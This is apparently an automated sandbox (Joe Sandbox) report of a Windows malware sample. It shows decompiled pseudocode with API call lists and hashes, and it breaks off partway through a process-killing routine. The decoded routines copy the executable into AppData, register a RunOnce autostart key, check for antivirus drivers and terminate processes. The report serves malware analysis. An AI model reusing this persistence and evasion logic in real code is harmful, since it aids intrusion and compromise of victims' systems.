                                    0x0f14444b
                                    0x0f14444e
                                    0x0f144451
                                    0x00000000
                                    0x0f144413
                                    0x0f1443e0
                                    0x0f144456
                                    0x0f14445d
                                    0x0f144465
                                    0x0f14446d
                                    0x0f144475
                                    0x0f14447d
                                    0x0f144485
                                    0x0f14448d
                                    0x0f144495
                                    0x0f14449d
                                    0x0f1444a5
                                    0x0f1444ad
                                    0x0f1444b5
                                    0x0f1444bd
                                    0x0f1444c5
                                    0x0f1444cd
                                    0x0f1444d5
                                    0x0f1444dd
                                    0x0f1444e5
                                    0x0f1444ed
                                    0x0f1444f5
                                    0x0f1444fd
                                    0x0f144505
                                    0x0f14450d
                                    0x0f144515
                                    0x0f14451d
                                    0x0f144525
                                    0x0f14452d
                                    0x0f144535
                                    0x0f14453d
                                    0x0f144545
                                    0x0f144555
                                    0x0f14455b
                                    0x0f144562
                                    0x0f14456f
                                    0x0f144575
                                    0x0f144562
                                    0x0f144586
                                    0x0f144593
                                    0x0f14459d

                                    APIs
                                    • lstrcpyW.KERNEL32 ref: 0F1443E2
                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1443E9
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F144555
                                    • wsprintfW.USER32 ref: 0F14456F
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0F144586
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                    • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                    • API String ID: 4033391921-3341315666
                                    • Opcode ID: ed4d2fc337b12ef394304a99f0c495e60676ea363b189442c3d467f059983934
                                    • Instruction ID: 6eb692c728df9f422449e190f679b6081e86359edc9bd320571ccf92c031d684
                                    • Opcode Fuzzy Hash: ed4d2fc337b12ef394304a99f0c495e60676ea363b189442c3d467f059983934
                                    • Instruction Fuzzy Hash: A6418074504380CBD720DF10D54832BBFE2FBC0B59F54491CEA984B252D7BAA5A9CF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 94%
                                    			E0F142960(WCHAR* __ecx, void* __eflags) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				short _v32;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				short _v140;
                                    				long _t45;
                                    				WCHAR* _t58;
                                    
                                    				_t58 = __ecx;
                                    				_v32 = 0x520050;
                                    				_v28 = 0x440049;
                                    				_push(0x41);
                                    				_v24 = 0x520055;
                                    				_v20 = 0x530041;
                                    				_v16 = 0x4b0048;
                                    				_v12 = 0x41;
                                    				E0F1482B0( &_v32, lstrlenW( &_v32)); // executed
                                    				_v140 = 0x4f0053;
                                    				_v136 = 0x540046;
                                    				_v132 = 0x410057;
                                    				_v128 = 0x450052;
                                    				_v124 = 0x4d005c;
                                    				_v120 = 0x630069;
                                    				_v116 = 0x6f0072;
                                    				_v112 = 0x6f0073;
                                    				_v108 = 0x740066;
                                    				_v104 = 0x57005c;
                                    				_v100 = 0x6e0069;
                                    				_v96 = 0x6f0064;
                                    				_v92 = 0x730077;
                                    				_v88 = 0x43005c;
                                    				_v84 = 0x720075;
                                    				_v80 = 0x650072;
                                    				_v76 = 0x74006e;
                                    				_v72 = 0x650056;
                                    				_v68 = 0x730072;
                                    				_v64 = 0x6f0069;
                                    				_v60 = 0x5c006e;
                                    				_v56 = 0x750052;
                                    				_v52 = 0x4f006e;
                                    				_v48 = 0x63006e;
                                    				_v44 = 0x65;
                                    				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
                                    				if(_t45 != 0) {
                                    					return 0;
                                    				} else {
                                    					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
                                    					asm("sbb esi, esi"); // executed
                                    					RegCloseKey(_v8);
                                    					_t39 =  &(_t58[0]); // 0x1
                                    					return _t39;
                                    				}
                                    			}





































                                    0x0f14296b
                                    0x0f14296d
                                    0x0f142979
                                    0x0f142980
                                    0x0f142984
                                    0x0f14298c
                                    0x0f142993
                                    0x0f14299a
                                    0x0f1429a8
                                    0x0f1429b0
                                    0x0f1429bd
                                    0x0f1429c7
                                    0x0f1429ce
                                    0x0f1429eb
                                    0x0f1429f8
                                    0x0f1429ff
                                    0x0f142a06
                                    0x0f142a0d
                                    0x0f142a14
                                    0x0f142a1b
                                    0x0f142a22
                                    0x0f142a29
                                    0x0f142a30
                                    0x0f142a37
                                    0x0f142a3e
                                    0x0f142a45
                                    0x0f142a4c
                                    0x0f142a53
                                    0x0f142a5a
                                    0x0f142a61
                                    0x0f142a68
                                    0x0f142a6f
                                    0x0f142a76
                                    0x0f142a7d
                                    0x0f142a84
                                    0x0f142a8c
                                    0x0f142ac7
                                    0x0f142a8e
                                    0x0f142aa4
                                    0x0f142aaf
                                    0x0f142ab1
                                    0x0f142ab7
                                    0x0f142abf
                                    0x0f142abf

                                    APIs
                                    • lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0F14299D
                                      • Part of subcall function 0F1482B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1482CD
                                      • Part of subcall function 0F1482B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1482FB
                                      • Part of subcall function 0F1482B0: GetModuleHandleA.KERNEL32(?), ref: 0F14834F
                                      • Part of subcall function 0F1482B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F14835D
                                      • Part of subcall function 0F1482B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F14836C
                                      • Part of subcall function 0F1482B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1483B5
                                      • Part of subcall function 0F1482B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1483C3
                                    • RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F142C45,00000000), ref: 0F142A84
                                    • lstrlenW.KERNEL32(00000000), ref: 0F142A8F
                                    • RegSetValueExW.KERNEL32(0F142C45,00520050,00000000,00000001,00000000,00000000), ref: 0F142AA4
                                    • RegCloseKey.KERNEL32(0F142C45), ref: 0F142AB1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                    • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                    • API String ID: 553367697-3791882466
                                    • Opcode ID: 0216185ae4be2181c9bbfde112e98789b521de60d06b4b8af650ccc94b8eec54
                                    • Instruction ID: a6cea586eac24d1a694612c18f564dc7340b66448ebbe1a4bfa90be7eb7ebf4f
                                    • Opcode Fuzzy Hash: 0216185ae4be2181c9bbfde112e98789b521de60d06b4b8af650ccc94b8eec54
                                    • Instruction Fuzzy Hash: 4F31DBB094121DDFEB20CF91E948BEDBFB9FB01709F108119D5186B281D7BA59988F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 85%
                                    			E0F142D30() {
                                    				struct _WNDCLASSEXW _v52;
                                    				struct tagMSG _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				char _v96;
                                    				void* _t37;
                                    				short _t42;
                                    				void* _t49;
                                    				void* _t59;
                                    				void* _t60;
                                    				void* _t61;
                                    				void* _t62;
                                    				void* _t67;
                                    				void* _t69;
                                    				long _t71;
                                    
                                    				_push(_t62);
                                    				_push(_t69);
                                    				_v84.message = 0x6c006b;
                                    				_push(_t67);
                                    				_v84.wParam = 0x660069;
                                    				_v84.lParam = 0x73002e;
                                    				_v84.time = 0x730079;
                                    				_v84.pt = 0;
                                    				_v96 = 0x6c006b;
                                    				_v92 = 0x2e0031;
                                    				_v88 = 0x790073;
                                    				_v84.hwnd = 0x73;
                                    				_t37 = E0F142F50( &(_v84.message)); // executed
                                    				if(_t37 != 0) {
                                    					L5:
                                    					_v52.cbSize = 0x30;
                                    					_v52.style = 3;
                                    					_v52.lpfnWndProc = E0F142C50;
                                    					_v52.cbClsExtra = 0;
                                    					_v52.cbWndExtra = 0;
                                    					_v52.hInstance = GetModuleHandleW(0);
                                    					_v52.hIcon = 0;
                                    					_v52.hCursor = LoadCursorW(0, 0x7f00);
                                    					_v52.hbrBackground = 6;
                                    					_v52.lpszMenuName = 0;
                                    					_v52.lpszClassName = L"win32app";
                                    					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
                                    					_t42 = RegisterClassExW( &_v52);
                                    					_push(0);
                                    					if(_t42 != 0) {
                                    						GetModuleHandleW();
                                    						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
                                    						SetWindowLongW(_t71, 0xfffffff0, 0);
                                    						if(_t71 != 0) {
                                    							ShowWindow(_t71, 5);
                                    							UpdateWindow(_t71);
                                    							_t49 = CreateThread(0, 0, E0F142D10, _t71, 0, 0);
                                    							if(_t49 != 0) {
                                    								CloseHandle(_t49);
                                    							}
                                    							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
                                    								L15:
                                    								ExitThread(0);
                                    							} else {
                                    								do {
                                    									TranslateMessage( &_v84);
                                    								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
                                    								goto L15;
                                    							}
                                    						}
                                    						ExitThread(_t71);
                                    					}
                                    					ExitThread();
                                    				}
                                    				_t59 = E0F142F50( &_v96); // executed
                                    				if(_t59 != 0) {
                                    					goto L5;
                                    				}
                                    				_v84.message = 0x730066;
                                    				_v84.wParam = 0x660064;
                                    				_v84.lParam = 0x2e0077;
                                    				_v84.time = 0x790073;
                                    				_v84.pt = 0x73;
                                    				_t60 = E0F142F50( &(_v84.message)); // executed
                                    				if(_t60 != 0) {
                                    					goto L15;
                                    				}
                                    				_t61 = E0F1430A0(_t62, _t67, _t69); // executed
                                    				if(_t61 != 0) {
                                    					goto L15;
                                    				}
                                    				_push(_t61); // executed
                                    				E0F142AD0(); // executed
                                    				goto L5;
                                    			}


















                                    0x0f142d39
                                    0x0f142d3a
                                    0x0f142d3d
                                    0x0f142d45
                                    0x0f142d4a
                                    0x0f142d52
                                    0x0f142d5a
                                    0x0f142d62
                                    0x0f142d67
                                    0x0f142d6f
                                    0x0f142d77
                                    0x0f142d7f
                                    0x0f142d87
                                    0x0f142d8e
                                    0x0f142de9
                                    0x0f142df1
                                    0x0f142df9
                                    0x0f142e01
                                    0x0f142e09
                                    0x0f142e11
                                    0x0f142e22
                                    0x0f142e26
                                    0x0f142e3d
                                    0x0f142e41
                                    0x0f142e49
                                    0x0f142e51
                                    0x0f142e5f
                                    0x0f142e68
                                    0x0f142e6e
                                    0x0f142e73
                                    0x0f142e7b
                                    0x0f142eaf
                                    0x0f142eb4
                                    0x0f142ebc
                                    0x0f142ec8
                                    0x0f142ecf
                                    0x0f142ee3
                                    0x0f142eeb
                                    0x0f142eee
                                    0x0f142eee
                                    0x0f142f09
                                    0x0f142f3d
                                    0x0f142f3f
                                    0x0f142f0b
                                    0x0f142f17
                                    0x0f142f1c
                                    0x0f142f25
                                    0x00000000
                                    0x0f142f17
                                    0x0f142f09
                                    0x0f142ebf
                                    0x0f142ebf
                                    0x0f142e75
                                    0x0f142e75
                                    0x0f142d94
                                    0x0f142d9b
                                    0x00000000
                                    0x00000000
                                    0x0f142da1
                                    0x0f142da9
                                    0x0f142db1
                                    0x0f142db9
                                    0x0f142dc1
                                    0x0f142dc9
                                    0x0f142dd0
                                    0x00000000
                                    0x00000000
                                    0x0f142dd6
                                    0x0f142ddd
                                    0x00000000
                                    0x00000000
                                    0x0f142de3
                                    0x0f142de4
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0F142F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F142F74
                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F142E19
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0F142E2E
                                    • LoadIconW.USER32 ref: 0F142E59
                                    • RegisterClassExW.USER32 ref: 0F142E68
                                    • ExitThread.KERNEL32 ref: 0F142E75
                                      • Part of subcall function 0F142F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F142F8D
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F142E7B
                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F142E81
                                    • CreateWindowExW.USER32 ref: 0F142EA7
                                    • SetWindowLongW.USER32 ref: 0F142EB4
                                    • ExitThread.KERNEL32 ref: 0F142EBF
                                      • Part of subcall function 0F142F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F142FA8
                                      • Part of subcall function 0F142F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F142FCF
                                      • Part of subcall function 0F142F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F142FE3
                                      • Part of subcall function 0F142F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F142FFA
                                    • ExitThread.KERNEL32 ref: 0F142F3F
                                      • Part of subcall function 0F142AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F142AEA
                                      • Part of subcall function 0F142AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F142B2C
                                      • Part of subcall function 0F142AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F142B38
                                      • Part of subcall function 0F142AD0: ExitThread.KERNEL32 ref: 0F142C47
                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F142EC8
                                    • UpdateWindow.USER32(00000000), ref: 0F142ECF
                                    • CreateThread.KERNEL32 ref: 0F142EE3
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F142EEE
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F142F05
                                    • TranslateMessage.USER32(?), ref: 0F142F1C
                                    • DispatchMessageW.USER32 ref: 0F142F23
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F142F37
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                    • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                    • API String ID: 3011903443-520298170
                                    • Opcode ID: e058e58fe8f616008d40985dd8100d70ef5580f741929388c8804c13e2b5d6a7
                                    • Instruction ID: c09f69e4e6adec391483c8dac804f3f1c5db6c8dcd4e68adf4f8008f2f219120
                                    • Opcode Fuzzy Hash: e058e58fe8f616008d40985dd8100d70ef5580f741929388c8804c13e2b5d6a7
                                    • Instruction Fuzzy Hash: E6518074688341AFE3109F61CC09B5B7BE4AF84B55F50091CF684AA2C1D7B8F199CF96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 387 f142ad0-f142b00 VirtualAlloc 388 f142b02-f142b1a 387->388 389 f142b1c-f142b1e 387->389 390 f142b20-f142b4a GetModuleFileNameW GetTempPathW call f1481f0 388->390 389->390 393 f142b53-f142bae lstrlenW call f1482b0 GetEnvironmentVariableW call f1481f0 390->393 394 f142b4c-f142b4e 390->394 402 f142bb0-f142bc4 393->402 403 f142bd8-f142bfd lstrcatW * 3 call f142890 393->403 395 f142c40 call f142960 394->395 400 f142c45-f142c47 ExitThread 395->400 407 f142bc6-f142bd1 402->407 408 f142bd3 402->408 406 f142c02-f142c07 403->406 406->400 409 f142c09-f142c1d 406->409 407->408 410 f142bd5-f142bd6 407->410 408->410 413 f142c2c 409->413 414 f142c1f-f142c2a 409->414 411 f142c2f-f142c3d wsprintfW 410->411 411->395 415 f142c2e 413->415 414->413 414->415 415->411
                                    C-Code - Quality: 93%
                                    			E0F142AD0() {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				short _v20;
                                    				WCHAR* _v24;
                                    				WCHAR* _v28;
                                    				long _v32;
                                    				intOrPtr _v36;
                                    				WCHAR* _t24;
                                    				void* _t27;
                                    				WCHAR* _t33;
                                    				WCHAR* _t38;
                                    				signed int _t40;
                                    				signed int _t46;
                                    				WCHAR* _t50;
                                    				WCHAR* _t54;
                                    				void* _t56;
                                    				WCHAR* _t57;
                                    				void* _t58;
                                    				WCHAR* _t64;
                                    				WCHAR* _t65;
                                    				WCHAR* _t67;
                                    				signed int _t69;
                                    				void* _t71;
                                    				void* _t72;
                                    
                                    				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                    				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
                                    				_v24 = _t24;
                                    				_t64 = _t24;
                                    				_v32 = 0;
                                    				if(_t24 == 0) {
                                    					_t67 = 0;
                                    					_t50 = 0;
                                    					__eflags = 0;
                                    				} else {
                                    					_t3 =  &(_t24[0x101]); // 0x202
                                    					_t65 = _t3;
                                    					_v32 = 0x404;
                                    					_t50 = _t65;
                                    					_t67 = _t24;
                                    					_t64 =  &(_t65[0x101]);
                                    				}
                                    				_v28 = _t67;
                                    				GetModuleFileNameW(0, _t67, 0x100);
                                    				GetTempPathW(0x100, _t50);
                                    				_t6 =  &(_t50[1]); // 0x204
                                    				_t27 = E0F1481F0(_t67, _t6);
                                    				_t75 = _t27;
                                    				if(_t27 == 0) {
                                    					_v20 = 0x520050;
                                    					_v8 = 0;
                                    					_push(0x52);
                                    					_v16 = 0x440049;
                                    					_v12 = 0x520055;
                                    					E0F1482B0( &_v20, lstrlenW( &_v20)); // executed
                                    					_t72 = _t71 + 4;
                                    					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                    					_t13 =  &(_t50[1]); // 0x2
                                    					_t54 = _t67;
                                    					_t33 = E0F1481F0(_t54, _t13);
                                    					__eflags = _t33;
                                    					if(_t33 == 0) {
                                    						lstrcatW(_t50, L"\\Microsoft\\");
                                    						lstrcatW(_t50,  &_v20);
                                    						lstrcatW(_t50, L".exe");
                                    						_push(_t54);
                                    						_t38 = E0F142890(_v28, _t50); // executed
                                    						_t72 = _t72 + 4;
                                    						__eflags = _t38;
                                    						if(_t38 == 0) {
                                    							goto L17;
                                    						}
                                    						_t40 = lstrlenW(_t50);
                                    						__eflags = _v28;
                                    						_t56 = 0xa + _t40 * 2;
                                    						if(_v28 == 0) {
                                    							L13:
                                    							_t64 = 0;
                                    							__eflags = 0;
                                    							L14:
                                    							_push(_t50);
                                    							L15:
                                    							wsprintfW(_t64, L"\"%s\"");
                                    							_t57 = _t64;
                                    							goto L16;
                                    						}
                                    						__eflags = _v36 + _t56 - 0x800;
                                    						if(__eflags < 0) {
                                    							goto L14;
                                    						}
                                    						goto L13;
                                    					}
                                    					_t46 = lstrlenW(_t67);
                                    					__eflags = _v28;
                                    					_t58 = 0xa + _t46 * 2;
                                    					if(_v28 == 0) {
                                    						L8:
                                    						_t64 = 0;
                                    						__eflags = 0;
                                    						L9:
                                    						_push(_t67);
                                    						goto L15;
                                    					}
                                    					__eflags = _v36 + _t58 - 0x800;
                                    					if(__eflags < 0) {
                                    						goto L9;
                                    					}
                                    					goto L8;
                                    				} else {
                                    					_t57 = _t67;
                                    					L16:
                                    					E0F142960(_t57, _t75); // executed
                                    					L17:
                                    					ExitThread(0);
                                    				}
                                    			}




























                                    0x0f142ad6
                                    0x0f142aea
                                    0x0f142af0
                                    0x0f142af4
                                    0x0f142af6
                                    0x0f142b00
                                    0x0f142b1c
                                    0x0f142b1e
                                    0x0f142b1e
                                    0x0f142b02
                                    0x0f142b02
                                    0x0f142b02
                                    0x0f142b08
                                    0x0f142b10
                                    0x0f142b12
                                    0x0f142b14
                                    0x0f142b14
                                    0x0f142b28
                                    0x0f142b2c
                                    0x0f142b38
                                    0x0f142b3e
                                    0x0f142b43
                                    0x0f142b48
                                    0x0f142b4a
                                    0x0f142b55
                                    0x0f142b62
                                    0x0f142b67
                                    0x0f142b6c
                                    0x0f142b75
                                    0x0f142b89
                                    0x0f142b8e
                                    0x0f142b9c
                                    0x0f142ba2
                                    0x0f142ba5
                                    0x0f142ba7
                                    0x0f142bac
                                    0x0f142bae
                                    0x0f142be4
                                    0x0f142bec
                                    0x0f142bf4
                                    0x0f142bf6
                                    0x0f142bfd
                                    0x0f142c02
                                    0x0f142c05
                                    0x0f142c07
                                    0x00000000
                                    0x00000000
                                    0x0f142c0f
                                    0x0f142c11
                                    0x0f142c16
                                    0x0f142c1d
                                    0x0f142c2c
                                    0x0f142c2c
                                    0x0f142c2c
                                    0x0f142c2e
                                    0x0f142c2e
                                    0x0f142c2f
                                    0x0f142c35
                                    0x0f142c3b
                                    0x00000000
                                    0x0f142c3d
                                    0x0f142c25
                                    0x0f142c2a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f142c2a
                                    0x0f142bb6
                                    0x0f142bb8
                                    0x0f142bbd
                                    0x0f142bc4
                                    0x0f142bd3
                                    0x0f142bd3
                                    0x0f142bd3
                                    0x0f142bd5
                                    0x0f142bd5
                                    0x00000000
                                    0x0f142bd5
                                    0x0f142bcc
                                    0x0f142bd1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f142b4c
                                    0x0f142b4c
                                    0x0f142c40
                                    0x0f142c40
                                    0x0f142c45
                                    0x0f142c47
                                    0x0f142c47

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F142AEA
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F142B2C
                                    • GetTempPathW.KERNEL32(00000100,00000000), ref: 0F142B38
                                    • lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F142B7D
                                      • Part of subcall function 0F1482B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1482CD
                                      • Part of subcall function 0F1482B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1482FB
                                      • Part of subcall function 0F1482B0: GetModuleHandleA.KERNEL32(?), ref: 0F14834F
                                      • Part of subcall function 0F1482B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F14835D
                                      • Part of subcall function 0F1482B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F14836C
                                      • Part of subcall function 0F1482B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1483B5
                                      • Part of subcall function 0F1482B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1483C3
                                    • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F142B9C
                                    • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F142BE4
                                    • lstrcatW.KERNEL32(00000000,?), ref: 0F142BEC
                                    • lstrcatW.KERNEL32(00000000,.exe), ref: 0F142BF4
                                    • wsprintfW.USER32 ref: 0F142C35
                                    • ExitThread.KERNEL32 ref: 0F142C47
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                    • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                    • API String ID: 139215849-2398311915
                                    • Opcode ID: 0b0746d27575f4c20da221b732bb0b7e3298566cbb58a490d914f19b22cc9836
                                    • Instruction ID: 13167adf162c0deaad7b641690974352a0c935d9d64dd98c8fb5617c5ebc28c7
                                    • Opcode Fuzzy Hash: 0b0746d27575f4c20da221b732bb0b7e3298566cbb58a490d914f19b22cc9836
                                    • Instruction Fuzzy Hash: 5241B375244310AFE304DF20DC49F6B7BD8AFC4715F054428B54997282DBB8F9A9CBA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 430 f1448c0-f144a56 CreateToolhelp32Snapshot VirtualAlloc 431 f144a58-f144a61 430->431 432 f144a6b-f144a71 430->432 431->432 433 f144a63-f144a65 Process32FirstW 431->433 434 f144a74-f144a76 432->434 433->432 435 f144a80-f144a8d 434->435 437 f144a8f-f144a9f OpenProcess 435->437 438 f144abb-f144ac2 435->438 439 f144ab5 437->439 440 f144aa1-f144ab3 TerminateProcess CloseHandle 437->440 438->435 441 f144ac4-f144ad5 Process32NextW 438->441 439->438 440->438 441->434 442 f144ad7-f144ad9 441->442 443 f144ae9-f144af2 FindCloseChangeNotification 442->443 444 f144adb-f144ae3 VirtualFree 442->444 444->443
                                    C-Code - Quality: 98%
                                    			E0F1448C0() {
                                    				char* _v12;
                                    				char* _v16;
                                    				char* _v20;
                                    				char* _v24;
                                    				char* _v28;
                                    				char* _v32;
                                    				char* _v36;
                                    				char* _v40;
                                    				char* _v44;
                                    				char* _v48;
                                    				char* _v52;
                                    				char* _v56;
                                    				char* _v60;
                                    				char* _v64;
                                    				char* _v68;
                                    				char* _v72;
                                    				char* _v76;
                                    				char* _v80;
                                    				char* _v84;
                                    				char* _v88;
                                    				char* _v92;
                                    				char* _v96;
                                    				char* _v100;
                                    				char* _v104;
                                    				char* _v108;
                                    				char* _v112;
                                    				char* _v116;
                                    				char* _v120;
                                    				char* _v124;
                                    				char* _v128;
                                    				char* _v132;
                                    				char* _v136;
                                    				char* _v140;
                                    				char* _v144;
                                    				char* _v148;
                                    				char* _v152;
                                    				char* _v156;
                                    				char* _v160;
                                    				char* _v164;
                                    				void* _v172;
                                    				void* _t49;
                                    				void* _t50;
                                    				int _t51;
